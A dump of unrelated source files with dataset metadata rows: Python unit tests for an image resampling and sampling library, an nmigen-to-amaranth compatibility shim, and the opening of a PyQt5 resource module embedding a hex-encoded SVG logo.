input_shape=(64, 96, 1),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
sampler.current_index = 0
sampler.current_slice = 0
out_img = sampler.slice_next(185, img)
self.assertEqual(sampler.current_index, 1)
self.assertEqual(sampler.current_slice, 0)
self.assertEqual(out_img.shape, (185, 64, 96, 1))
for i in range(37):
for j in range(5):
idx = i * 5 + j
np.testing.assert_almost_equal(out_img[idx, ...],
img_gray[i:i+64, j:j+96, :])
def test_samples_as_much_as_it_can(self):
img = np.random.rand(100, 100, 3)
sampler = preproc.CompleteSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
sampler.current_index = 0
sampler.current_slice = 0
out_img = sampler.slice_next(187, img)
self.assertEqual(sampler.current_index, 1)
self.assertEqual(sampler.current_slice, 0)
self.assertEqual(out_img.shape, (185, 64, 96, 3))
for i in range(37):
for j in range(5):
idx = i * 5 + j
np.testing.assert_almost_equal(out_img[idx, ...],
img[i:i+64, j:j+96, :])
def test_samples_as_much_as_it_can_with_an_offset(self):
img = np.random.rand(100, 100, 3)
sampler = preproc.CompleteSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
sampler.current_index = 0
sampler.current_slice = 5
out_img = sampler.slice_next(187, img)
self.assertEqual(sampler.current_index, 1)
self.assertEqual(sampler.current_slice, 0)
self.assertEqual(out_img.shape, (180, 64, 96, 3))
for i in range(37):
for j in range(5):
idx = i * 5 + j - 5
if idx < 0:
continue
np.testing.assert_almost_equal(out_img[idx, ...],
img[i:i+64, j:j+96, :])
def test_samples_multiple_whole_images(self):
img1 = np.random.rand(100, 100, 3)
img2 = np.random.rand(100, 100, 3)
sampler = preproc.CompleteSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
sampler.current_index = 0
sampler.current_slice = 0
out_img1, out_img2 = sampler.slice_next(185, img1, img2)
self.assertEqual(sampler.current_index, 1)
self.assertEqual(sampler.current_slice, 0)
self.assertEqual(out_img1.shape, (185, 64, 96, 3))
self.assertEqual(out_img2.shape, (185, 64, 96, 3))
for i in range(37):
for j in range(5):
idx = i * 5 + j
np.testing.assert_almost_equal(out_img1[idx, ...],
img1[i:i+64, j:j+96, :])
np.testing.assert_almost_equal(out_img2[idx, ...],
img2[i:i+64, j:j+96, :])
def test_resample_all_over_several_images(self):
img1 = np.random.rand(100, 100, 3)
img2 = np.random.rand(110, 110, 3)
class FakeCompleteSampler(preproc.CompleteSampler):
def load_file(self, filename):
if filename.name == '001.jpg':
return img1
elif filename.name == '003.jpg':
return img2
else:
return None
sampler = FakeCompleteSampler(files=['001.jpg', '002.jpg', '003.jpg'],
image_layout='tensorflow',
batch_size=1024,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img = sampler.resample_all(1024)
self.assertEqual(out_img.shape, (1024, 64, 96, 3))
self.assertEqual(sampler.current_slice, 134)
self.assertEqual(sampler.current_index, 0)
for i in range(37):
for j in range(5):
idx = i * 5 + j
np.testing.assert_almost_equal(out_img[idx, ...],
img1[i:i+64, j:j+96, :])
for i in range(47):
for j in range(15):
idx = i * 15 + j + 185
np.testing.assert_almost_equal(out_img[idx, ...],
img2[i:i+64, j:j+96, :])
for i in range(37):
for j in range(5):
idx = i * 5 + j + 890
if idx >= 1024:
break
np.testing.assert_almost_equal(out_img[idx, ...],
img1[i:i+64, j:j+96, :])
def test_resample_all_over_several_images_with_masks(self):
img1 = np.random.rand(100, 100, 3)
img2 = np.random.rand(110, 110, 3)
mask1 = np.random.rand(100, 100, 1)
mask2 = np.random.rand(110, 110, 1)
class FakeCompleteSampler(preproc.CompleteSampler):
def load_file(self, filename):
if filename.name == '001.jpg':
return img1
elif filename.name == '003.jpg':
return img2
else:
return None
def load_mask(self, filename, img):
if filename.name == '001.jpg':
return mask1
elif filename.name == '003.jpg':
return mask2
else:
return None
sampler = FakeCompleteSampler(files=['001.jpg', '002.jpg', '003.jpg'],
masks=['001.npz', '002.npz', '003.npz'],
image_layout='tensorflow',
batch_size=1024,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img, out_mask = sampler.resample_all(1024)
self.assertEqual(out_img.shape, (1024, 64, 96, 3))
self.assertEqual(out_mask.shape, (1024, 64, 96, 1))
self.assertEqual(sampler.current_slice, 134)
self.assertEqual(sampler.current_index, 0)
for i in range(37):
for j in range(5):
idx = i * 5 + j
np.testing.assert_almost_equal(out_img[idx, ...],
img1[i:i+64, j:j+96, :])
np.testing.assert_almost_equal(out_mask[idx, ...],
mask1[i:i+64, j:j+96, :])
for i in range(47):
for j in range(15):
idx = i * 15 + j + 185
np.testing.assert_almost_equal(out_img[idx, ...],
img2[i:i+64, j:j+96, :])
np.testing.assert_almost_equal(out_mask[idx, ...],
mask2[i:i+64, j:j+96, :])
for i in range(37):
for j in range(5):
idx = i * 5 + j + 890
if idx >= 1024:
break
np.testing.assert_almost_equal(out_img[idx, ...],
img1[i:i+64, j:j+96, :])
np.testing.assert_almost_equal(out_mask[idx, ...],
mask1[i:i+64, j:j+96, :])
class TestRandomSampler(unittest.TestCase):
def test_load_mask(self):
img = np.random.rand(300, 300, 3)
masks = {
'foo': [
[0.0, 0.0, 0.4, 0.5],
[0.9, 0.9, 1.0, 1.0],
],
}
sampler = preproc.RandomSampler(files=[],
masks=masks,
image_layout='theano',
batch_size=1,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_mask = sampler.load_mask(pathlib.Path('grr/foo.jpg'), img)
self.assertEqual(out_mask.shape, (300, 300, 1))
exp_mask = np.zeros((300, 300, 1), dtype=np.bool)
exp_mask[150:, :120, :] = True
exp_mask[:30, 270:, :] = True
np.testing.assert_almost_equal(exp_mask, out_mask)
def test_resample_image_theano(self):
img = np.random.rand(300, 300, 3)
sampler = preproc.RandomSampler(files=[],
image_layout='theano',
batch_size=1,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img = sampler.resample_image(img)
self.assertEqual(out_img.shape, (3, 96, 64))
def test_resample_image_tensorflow(self):
img = np.random.rand(300, 300, 3)
sampler = preproc.RandomSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img = sampler.resample_image(img)
self.assertEqual(out_img.shape, (64, 96, 3))
def test_resample_image_tensorflow_color_to_gray(self):
img = np.random.rand(300, 300, 3)
sampler = preproc.RandomSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(64, 96, 1),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img = sampler.resample_image(img)
self.assertEqual(out_img.shape, (64, 96, 1))
def test_can_resample_with_fixed_params_no_change(self):
img = np.random.rand(300, 300, 3)
sampler = preproc.RandomSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(300, 300, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img = sampler.resample_image(
img, size=300, theta=0, shift=[0, 0],
flip_horizontal=False)
exp_img = img
np.testing.assert_almost_equal(exp_img, out_img, decimal=4)
def test_can_resample_with_fixed_params_zero_pad_no_change(self):
img = np.random.rand(300, 300, 3)
sampler = preproc.RandomSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(300, 300, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
zero_padding=10,
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img = sampler.resample_image(
img, size=300, theta=0, shift=[10, 10],
flip_horizontal=False)
exp_img = img
np.testing.assert_almost_equal(exp_img, out_img, decimal=4)
def test_can_resample_with_fixed_params_shifts_flips(self):
img = np.random.rand(300, 300, 3)
sampler = preproc.RandomSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(200, 200, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
flip_vertical=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img = sampler.resample_image(
img, size=200, theta=0, shift=[10, 10],
flip_horizontal=True, flip_vertical=True)
exp_img = img[10:-90, 10:-90, :]
exp_img = exp_img[::-1, ::-1, :]
np.testing.assert_almost_equal(exp_img, out_img, decimal=4)
def test_can_resample_with_fixed_params_only_resize(self):
img = np.random.rand(300, 300, 3)
sampler = preproc.RandomSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(64, 96, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img = sampler.resample_image(
img, size=300, theta=0, shift=[0, 0],
flip_horizontal=False)
exp_img = preproc.resample_in_box(
img, 300, np.eye(2), np.array([[150.0], [150.0]]),
input_shape=(64, 96, 3))
np.testing.assert_almost_equal(exp_img, out_img)
def test_can_resample_multiple_images_with_same_transform(self):
img1 = np.random.rand(300, 300, 3)
img2 = np.random.rand(300, 300, 3)
sampler = preproc.RandomSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(200, 200, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img1, out_img2 = sampler.resample_image(
img1, img2, size=200, theta=0, shift=[10, 10],
flip_horizontal=True)
exp_img1 = img1[10:-90, 10:-90, :]
exp_img1 = exp_img1[:, ::-1, :]
np.testing.assert_almost_equal(exp_img1, out_img1, decimal=4)
exp_img2 = img2[10:-90, 10:-90, :]
exp_img2 = exp_img2[:, ::-1, :]
np.testing.assert_almost_equal(exp_img2, out_img2, decimal=4)
def test_can_resample_multiple_images_with_same_transform_padding(self):
img1 = np.random.rand(300, 300, 3)
img2 = np.random.rand(300, 300, 3)
sampler = preproc.RandomSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(200, 200, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None,
zero_padding=5)
out_img1, out_img2 = sampler.resample_image(
img1, img2, size=200, theta=0, shift=[10, 10],
flip_horizontal=True)
exp_img1 = img1[5:205, 5:205, :]
exp_img1 = exp_img1[:, ::-1, :]
np.testing.assert_almost_equal(exp_img1, out_img1, decimal=4)
exp_img2 = img2[5:205, 5:205, :]
exp_img2 = exp_img2[:, ::-1, :]
np.testing.assert_almost_equal(exp_img2, out_img2, decimal=4)
def test_can_resample_multiple_images_random_transform(self):
img1 = np.random.rand(300, 300, 3)
img2 = img1.copy()
sampler = preproc.RandomSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(200, 200, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
flip_vertical=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img1, out_img2 = sampler.resample_image(
img1, img2)
np.testing.assert_almost_equal(out_img1, out_img2, decimal=4)
def test_can_resample_mask_with_image_same_transform(self):
img1 = np.random.rand(300, 300, 3)
img2 = np.zeros((300, 300), dtype=np.bool)
img2[10:-90, 10:-90] = False
sampler = preproc.RandomSampler(files=[],
image_layout='tensorflow',
batch_size=1,
input_shape=(200, 200, 3),
size_range=(128, 256),
rotation_range=(-10, 10),
flip_horizontal=True,
noise_type='none',
noise_fraction=0.1,
cache_size=None)
out_img1, out_img2 = sampler.resample_image(
img1, img2, size=200, theta=0, shift=[10, 10],
flip_horizontal=True)
exp_img1 = img1[10:-90, 10:-90, :]
exp_img1 = exp_img1[:, ::-1, :]
np.testing.assert_almost_equal(exp_img1, out_img1, decimal=4)
exp_img2 = img2[10:-90, 10:-90]
exp_img2 = exp_img2[:, ::-1]
np.testing.assert_almost_equal(exp_img2, out_img2, decimal=4)
self.assertTrue(np.all(exp_img2 == 0))
class TestResampleInBox(unittest.TestCase):
def test_resample_grayscale_2d(self):
img = np.random.random((512, 512, 3))
img = np.mean(img, axis=2)
scale = 2
rot = np.array([
[1, 0],
[0, 1],
])
shift = np.array([
[1], [1]
])
out_img = preproc.resample_in_box(
img, scale, rot, shift, input_shape=256)
self.assertEqual(out_img.shape, (256, 256))
def test_resample_grayscale_3d(self):
img = np.random.random((512, 512, 3))
img = np.mean(img, axis=2)
img = img[:, :, np.newaxis]
scale = 2
rot = np.array([
[1, 0],
[0, 1],
])
shift = np.array([
[1], [1]
])
out_img = preproc.resample_in_box(
img, scale, rot, shift, input_shape=256)
self.assertEqual(out_img.shape, (256, 256, 1))
def test_resample_grayscale_3d_colors(self):
img = np.random.random((512, 512, 3))
scale = 2
rot = np.array([
[1, 0],
[0, 1],
])
shift = np.array([
[1], [1]
])
out_img = preproc.resample_in_box(
img, scale, rot, shift, input_shape=256)
self.assertEqual(out_img.shape, (256, 256, 3))
def test_resample_grayscale_3d_colors_x_y_diff(self):
img = np.random.random((512, 512, 3))
scale = 2
rot = np.array([
[1, 0],
[0, 1],
])
shift = np.array([
[1], [1]
])
out_img = preproc.resample_in_box(
img, scale, rot, shift, input_shape=(256, 128))
self.assertEqual(out_img.shape, (256, 128, 3))
def test_resample_grayscale_2d_to_colors(self):
img = np.random.random((512, 512, ))
scale = 2
rot = np.array([
[1, 0],
[0, 1],
])
shift = np.array([
[1], [1]
])
out_img = preproc.resample_in_box(
img, scale, rot, shift, input_shape=(256, 128, 3))
self.assertEqual(out_img.shape, (256, 128, 3))
def test_resample_grayscale_3d_to_colors(self):
img = np.random.random((512, 512, 1))
scale = 2
rot = np.array([
[1, 0],
[0, 1],
])
shift = np.array([
[1], [1]
])
out_img = preproc.resample_in_box(
img, scale, rot, shift, input_shape=(256, 128, 3))
self.assertEqual(out_img.shape, (256, 128, 3))
def test_resample_colors_to_grayscale(self):
img = np.random.random((512, 512, 3))
scale = 2
rot = np.array([
[1, 0],
[0, 1],
])
shift = np.array([
[1], [1]
])
out_img = preproc.resample_in_box(
img, scale, rot, shift, input_shape=(256, 128, 1))
self.assertEqual(out_img.shape, (256, 128, 1))
def test_4d_input_shape_raises_errors(self):
img = np.random.random((512, 512, 3))
scale = 2
rot = np.array([
[1, 0],
[0, 1],
])
shift = np.array([
[1], [1]
])
with self.assertRaises(ValueError):
preproc.resample_in_box(
img, scale, rot, shift, input_shape=(256, 128, 1, 1))
def test_input_shape_with_crazy_dims_raises_errors(self):
img = np.random.random((512, 512, 3))
scale = 2
rot = np.array([
[1, 0],
[0, 1],
])
shift = np.array([
[1], [1]
])
with self.assertRaises(ValueError):
preproc.resample_in_box(
img, scale, rot, shift, input_shape=(256, 128, 2))
class TestImageResampler(helpers.FileSystemTestCase):
def fullpath(self, *args):
r = self.tempdir
for a in args:
r = r / a
return r
def make_image(self, *args, **kwargs):
image_path = self.fullpath(*args)
size = kwargs.pop('size', (512, 512, 3))
# Random noise image
img = np.random.random(size)
img = np.round(img * 255)
img[img < 0] = 0
img[img > 255] = 255
img = Image.fromarray(img.astype(np.uint8))
image_path.parent.mkdir(exist_ok=True, parents=True)
img.save(str(image_path))
return image_path
def make_mask(self, *args, **kwargs):
mask_path = self.fullpath(*args)
size = kwargs.pop('size', (512, 512))
# Random noise image
mask = np.random.random(size) > 0.5
mask_path.parent.mkdir(exist_ok=True, parents=True)
np.savez(str(mask_path), mask=mask, refined_mask=mask)
return mask_path
def make_resampler(self,
datadir=None,
data_finder=None,
mask_finder=None,
mask_type=None,
test_fraction=None,
validation_fraction=None,
**kwargs):
""" Make the ImageResampler object
:param Path datadir:
The data directory or self.tempdir
:param float validation_fraction:
How many images in the validation set (default 0)
:param \\*\\* kwargs:
Arguments to pass to the load_samplers method of the resampler object
:returns:
The loaded ImageResampler object
"""
if datadir is None:
datadir = self.tempdir
if data_finder is None:
data_finder = preproc.find_raw_data
proc = preproc.ImageResampler()
proc.set_data_loader(datadir, data_finder=data_finder)
if mask_finder is not None:
proc.set_mask_loader(mask_finder=mask_finder, mask_type=mask_type)
proc.load_files()
proc.calc_train_test_split(test_fraction=test_fraction,
validation_fraction=validation_fraction)
proc.load_samplers(**kwargs)
return proc
def test_is_split_under_datadir(self):
self.make_image('foo', '001.jpg')
proc = self.make_resampler(test_fraction=None,
validation_fraction=None,
batch_size=1)
self.assertTrue(proc.is_split_under_datadir(self.tempdir / 'foo'))
self.assertFalse(proc.is_split_under_datadir(self.tempdir / 'bees'))
self.assertFalse(proc.is_split_under_datadir(self.tempdir)) # FIXME: This should work
def test_resample_one_image(self):
self.make_image('foo', '001.jpg')
proc = self.make_resampler(test_fraction=None,
validation_fraction=None,
batch_size=1)
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (1, 1, 256, 256))
def test_resample_several_images(self):
self.make_image('foo', '001.jpg')
self.make_image('foo', '002.jpg')
self.make_image('foo', '003.jpg')
proc = self.make_resampler(test_fraction=None,
validation_fraction=0.333,
batch_size=2)
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (2, 1, 256, 256))
with self.assertRaises(ValueError):
imgs = next(proc.validation_data)
proc.validation_data.batch_size = 1
imgs = next(proc.validation_data)
self.assertEqual(imgs.shape, (1, 1, 256, 256))
self.assertEqual(len(proc.train_data), 2)
self.assertEqual(len(proc.validation_data), 1)
def test_resample_several_images_colored(self):
self.make_image('foo', '001.jpg')
self.make_image('foo', '002.jpg')
self.make_image('foo', '003.jpg')
proc = self.make_resampler(test_fraction=None,
validation_fraction=0.333,
batch_size=2,
input_shape=(256, 256, 3))
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (2, 3, 256, 256))
with self.assertRaises(ValueError):
imgs = next(proc.validation_data)
proc.validation_data.batch_size = 1
imgs = next(proc.validation_data)
self.assertEqual(imgs.shape, (1, 3, 256, 256))
self.assertEqual(len(proc.train_data), 2)
self.assertEqual(len(proc.validation_data), 1)
def test_resample_several_images_one_deleted(self):
i1 = self.make_image('foo', '001.jpg')
i2 = self.make_image('foo', '002.jpg')
i3 = self.make_image('foo', '003.jpg')
proc = self.make_resampler(test_fraction=None,
validation_fraction=0.0,
batch_size=3,
cache_size=0)
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (3, 1, 256, 256))
i1.unlink()
with self.assertRaises(ValueError):
next(proc.train_data)
proc.train_data.batch_size = 2
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (2, 1, 256, 256))
self.assertEqual(set(proc.train_data.files), {i2, i3})
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (2, 1, 256, 256))
self.assertEqual(set(proc.train_data.files), {i2, i3})
def test_resample_several_images_several_deleted(self):
i1 = self.make_image('foo', '001.jpg')
i2 = self.make_image('foo', '002.jpg')
i3 = self.make_image('foo', '003.jpg')
proc = self.make_resampler(test_fraction=None,
validation_fraction=0.0,
batch_size=3,
cache_size=0)
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (3, 1, 256, 256))
i1.unlink()
i3.unlink()
with self.assertRaises(ValueError):
next(proc.train_data)
proc.train_data.batch_size = 1
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (1, 1, 256, 256))
self.assertEqual(proc.train_data.files, [i2])
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (1, 1, 256, 256))
self.assertEqual(proc.train_data.files, [i2])
def test_resample_several_images_large_cache(self):
self.make_image('foo', '001.jpg')
self.make_image('foo', '002.jpg')
self.make_image('foo', '003.jpg')
proc = self.make_resampler(test_fraction=None,
validation_fraction=None,
batch_size=3,
cache_size=5)
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (3, 1, 256, 256))
self.assertEqual(len(proc.train_data), 3)
self.assertEqual(len(proc.train_data.image_cache), 3)
def test_resample_several_images_no_cache(self):
self.make_image('foo', '001.jpg')
self.make_image('foo', '002.jpg')
self.make_image('foo', '003.jpg')
proc = self.make_resampler(test_fraction=None,
validation_fraction=None,
batch_size=3,
cache_size=None)
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (3, 1, 256, 256))
self.assertEqual(len(proc.train_data), 3)
self.assertEqual(len(proc.train_data.image_cache), 0)
def test_resample_several_images_small_cache(self):
self.make_image('foo', '001.jpg')
self.make_image('foo', '002.jpg')
self.make_image('foo', '003.jpg')
proc = self.make_resampler(test_fraction=None,
validation_fraction=None,
batch_size=3,
cache_size=2)
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (3, 1, 256, 256))
self.assertEqual(len(proc.train_data), 3)
self.assertEqual(len(proc.train_data.image_cache), 2)
def test_resample_several_images_deduplicated_cache(self):
self.make_image('foo', '001.jpg')
self.make_image('bar', '001.jpg')
self.make_image('baz', '001.jpg')
proc = self.make_resampler(test_fraction=None,
validation_fraction=None,
batch_size=3,
cache_size=5)
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (3, 1, 256, 256))
self.assertEqual(len(proc.train_data), 3)
self.assertEqual(len(proc.train_data.image_cache), 1)
def test_resample_several_images_alternate_finder(self):
def find_data(datadir, blacklist=None):
channeldir = datadir / 'TL Brightfield'
for tiledir in channeldir.iterdir():
for image_file in tiledir.iterdir():
yield image_file
self.make_image('TL Brightfield', 's01', 's01-001.jpg')
self.make_image('TL Brightfield', 's02', 's02-001.jpg')
self.make_image('TL Brightfield', 's02', 's02-002.jpg')
proc = self.make_resampler(data_finder=find_data,
test_fraction=None,
validation_fraction=None,
batch_size=3,
cache_size=0)
imgs = next(proc.train_data)
self.assertEqual(imgs.shape, (3, 1, 256, 256))
self.assertEqual(len(proc.train_data), 3)
def test_resample_several_images_and_masks(self):
def find_data(datadir, blacklist=None):
channeldir = datadir / 'Corrected' / 'TL Brightfield'
for tiledir in channeldir.iterdir():
for image_file in tiledir.iterdir():
yield image_file
def find_masks(datadir, blacklist=None):
channeldir = datadir / 'colony_mask' / 'TL Brightfield'
for tiledir in channeldir.iterdir():
for image_file in tiledir.iterdir():
yield image_file.stem, image_file
self.make_image('Corrected', 'TL Brightfield', 's01', 's01-001.jpg')
self.make_image('Corrected', 'TL Brightfield', 's02', 's02-001.jpg')
self.make_image('Corrected', 'TL Brightfield', 's02', 's02-002.jpg')
self.make_mask('colony_mask', 'TL Brightfield', 's01', 's01-001.npz')
self.make_mask('colony_mask', 'TL Brightfield', 's02', 's02-001.npz')
proc = self.make_resampler(data_finder=find_data,
mask_finder=find_masks,
mask_type='file',
test_fraction=None,
validation_fraction=None,
batch_size=2,
cache_size=0)
imgs, masks = next(proc.train_data)
self.assertEqual(imgs.shape, (2, 1, 256, 256))
self.assertEqual(masks.shape, (2, 1, 256, 256))
self.assertEqual(len(proc.train_data), 2)
| 35.041176 | 94 | 0.4827 | 5,853 | 53,613 | 4.222792 | 0.064411 | 0.063724 | 0.032772 | 0.045881 | 0.846415 | 0.820036 | 0.800413 | 0.784269 | 0.770513 | 0.74826 | 0 | 0.076972 | 0.409695 | 53,613 | 1,529 | 95 | 35.064094 | 0.703994 | 0.010054 | 0 | 0.728339 | 0 | 0 | 0.020237 | 0 | 0 | 0 | 0 | 0.000654 | 0.156137 | 1 | 0.069495 | false | 0 | 0.006318 | 0.000903 | 0.100181 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
529cceb88a40f8d6d5bac678edf1f21d226993de | 211 | py | Python | nmigen/compat/sim/__init__.py | psumesh/nmigen | 7d611b8fc1d9e58853ff268ec38ff8f4131a9774 | [
"BSD-2-Clause"
] | 528 | 2020-01-28T18:21:00.000Z | 2021-12-09T06:27:51.000Z | nmigen/compat/sim/__init__.py | DX-MON/nmigen | a6a13dd612ee1c9215719c70a5aa410a8775ffdb | [
"BSD-2-Clause"
] | 360 | 2020-01-28T18:34:30.000Z | 2021-12-10T08:03:32.000Z | nmigen/compat/sim/__init__.py | DX-MON/nmigen | a6a13dd612ee1c9215719c70a5aa410a8775ffdb | [
"BSD-2-Clause"
] | 100 | 2020-02-06T21:55:46.000Z | 2021-11-25T19:20:44.000Z | from amaranth.compat.sim import *
from amaranth.compat.sim import __all__
import warnings
warnings.warn("instead of nmigen.compat.sim, use amaranth.compat.sim",
DeprecationWarning, stacklevel=2)
| 26.375 | 70 | 0.758294 | 27 | 211 | 5.777778 | 0.555556 | 0.230769 | 0.326923 | 0.269231 | 0.346154 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005618 | 0.156398 | 211 | 7 | 71 | 30.142857 | 0.870787 | 0 | 0 | 0 | 0 | 0 | 0.251185 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
52b597eeac18941a2b04a6b21ec00edd2a682853 | 35,328 | py | Python | pyqt5_material/resources/logos_rc.py | Virinas-code/pyqt5-material | f393c4d024d67e3a1754ece06c711d5491266978 | [
"BSD-2-Clause"
] | 8 | 2020-10-21T15:31:38.000Z | 2020-12-01T13:14:37.000Z | pyqt5_material/resources/logos_rc.py | Virinas-code/pyqt5-material | f393c4d024d67e3a1754ece06c711d5491266978 | [
"BSD-2-Clause"
] | 1 | 2020-12-05T20:33:44.000Z | 2020-12-06T04:42:05.000Z | pyqt5_material/resources/logos_rc.py | Virinas-code/pyqt5-material | f393c4d024d67e3a1754ece06c711d5491266978 | [
"BSD-2-Clause"
] | 3 | 2020-10-21T15:31:39.000Z | 2020-11-17T11:35:44.000Z | # -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.9.7)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x15\xce\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0d\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\
\x74\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\
\x65\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\
\x0d\x0a\x0d\x0a\x3c\x73\x76\x67\x0d\x0a\x20\x20\x20\x78\x6d\x6c\
\x6e\x73\x3a\x64\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\
\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\
\x74\x73\x2f\x31\x2e\x31\x2f\x22\x0d\x0a\x20\x20\x20\x78\x6d\x6c\
\x6e\x73\x3a\x63\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x63\x72\
\x65\x61\x74\x69\x76\x65\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x6f\x72\
\x67\x2f\x6e\x73\x23\x22\x0d\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\
\x3a\x72\x64\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\
\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\
\x32\x32\x2d\x72\x64\x66\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\
\x23\x22\x0d\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x73\x76\x67\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\
\x6f\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0d\x0a\x20\
\x20\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\
\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\x30\x2f\
\x73\x76\x67\x22\x0d\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\
\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\x73\x6f\x75\x72\x63\x65\x66\
